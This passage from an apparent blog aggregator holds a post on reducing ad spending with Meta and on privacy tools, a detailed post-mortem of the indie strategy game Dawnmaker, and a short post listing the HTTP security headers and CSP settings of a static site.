And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech’s ‘Privacy-Enhancing’ Techniques Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It’s like open I guess.)

Adrian Gaudebert3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we made our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece were I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned to ask for public funding. So in 2022 we only spent about half our time actually working on developing the game. In 2023, after having been rejected our main source of funding, we shrunk down our ambitions and focused on just making the game. We still spent time to improve our pitch deck and contacted some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and take it through the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that tentative customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That actually transpired in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. So it goes to say that Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess do all game creators with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot into a 2D board. That simplified a lot of things in terms of programming, of performance, and made us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and for which I am particularly proud: the game had very few bugs upon release, and none were blocking. I've achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier done when there is a single programmer, who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or such cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well, that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The end game would be to be able to realistically be making my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start by the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example, no 3D, no narration, no NPCs, etc. ) and keep to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. It was initially supposed to be a game that we wanted to make in about a year. We ended up working on it for more than two years and a half instead! There are several reasons why the scope got so out-of-control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed in having a long-term planning, with hard dates for key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that it would not sell significantly better by working more. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, insidiously we found ourselves working on a 2 to 3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousands of euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But, we should never start working on the "dream" game until the money is on our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we saw our game bigger than it ended up being, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discussed in the previous section, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

Looking back, I remember conversations we had were we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was, this is a $20 game, players will expect a lot of replayability, so we need to have a meta-progression that would enable it. I think that was a valid line of thought, if only we were actually making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. Too early we started working on adding art to our gameplay prototype. Our first recorded prototype, which we did in Godot, had some art in it. Basic one, sure, but art anyway. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing, in an environment that had little tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D, I had never worked on a 3D game before, so I had a learn a lot in order to do something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us in that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience in implementing 3D in a game, and we knew it, but we did not weight those enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in blender to integrating on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in blender, but export everything for a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was to not take the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of horizontal slice, as opposed to the vertical slice, and that blew my mind. The idea is, instead of building a small piece of your game with final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun. Without working on the game's feel, its signs and feedback, a tutorial, and so. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a bigger range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy about the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained in popularity a lot.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think that's part of a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case, getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others have found the game too easy and would have enjoyed more challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty, they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit with the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptative challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause for Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly in trying to sell the game to players. Presenting it as a "city building meets deckbuilding" is not a fantasy, it's genres. We tried to put forth the "combo" gameplay, telling that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay and not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's not surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great figure for the ambiance of the game, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts day 1 of the creation of a game. The 2 key elements that sell your game are the genre(s) of the game, and its fantasy or hook. Do not neglect those if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing stories that pop up regularly on some gamedev subreddits, it could have been way worse. Doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quick

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time or for the wrong things several times. That mainly happened because we had too much trust in the future, in the fact that we would find money easily, either by selling our game or by getting public money or investors. If we did get some public funding, that was not nearly enough to cover what we spent, and so Dawnmaker was mostly paid for by our personal savings.

The biggest misplacement of money we made was to poorly hire people. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize when they started that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bring very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved there. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to make out, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it counts much on the key areas of making games that sell.

Here are facts:

Dawnmaker vertical capsule

  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in big part because those companies invest too much in there first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's an economic context too: investments in games and game companies have slowed down to a trickle the past couple years, and they don't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are targeted to folks trying to create a games studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the authors talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criteria is not its quality, or its sales numbers. The number one success criteria is that people can buy it.

<figcaption>Dawnmaker's cinematic release trailer</figcaption>

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as many tools and wisdom as possible. Trying to make the best possible game with what time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spams, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Martisecurity headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/" Cache-Control "max-age=3600" Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';" Cross-Origin-Opener-Policy "same-origin" Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i" Referrer-Policy no-referrer-when-downgrade Cross-Origin-Resource-Policy same-origin Cross-Origin-Embedder-Policy require-corp Strict-Transport-Security "max-age=2592000" X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now. This is because I use the SingleFile extension to make mirrored copies of pages, so I need to move those into their own virtual host so I can go back to using the version without the unsafe-inline.

(update 23 Feb 2025) The Pagefind site search requires ‘unsafe-eval’ in CSP in order to support WASM. This should be wasm-unsafe-eval in the future.

To do WASM and inline styles, the new value for the Content-Security-Policy header is:

"base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-eval'; frame-ancestors 'self';"

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking we’re going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use, is this OK? the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives.
